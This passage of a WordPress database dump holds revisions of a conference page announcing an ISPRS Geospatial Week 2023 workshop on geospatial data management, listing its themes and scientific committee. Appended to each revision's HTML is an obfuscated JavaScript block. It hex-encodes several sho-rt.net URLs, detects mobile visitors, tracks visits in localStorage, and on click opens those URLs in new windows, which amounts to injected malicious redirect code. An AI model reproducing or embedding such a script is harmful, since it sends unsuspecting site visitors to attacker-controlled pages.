Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:49:50','2022-11-04 20:49:50','',2993,'https://gsw2023.com/?p=3007',0,'revision','',0),
(3008,1,'2022-11-04 20:50:32','2022-11-04 20:50:32','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI, Singapore</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:50:32','2022-11-04 20:50:32','',2993,'https://gsw2023.com/?p=3008',0,'revision','',0),
(3009,1,'2022-11-04 20:50:54','2022-11-04 20:50:54','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI, Singapore</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 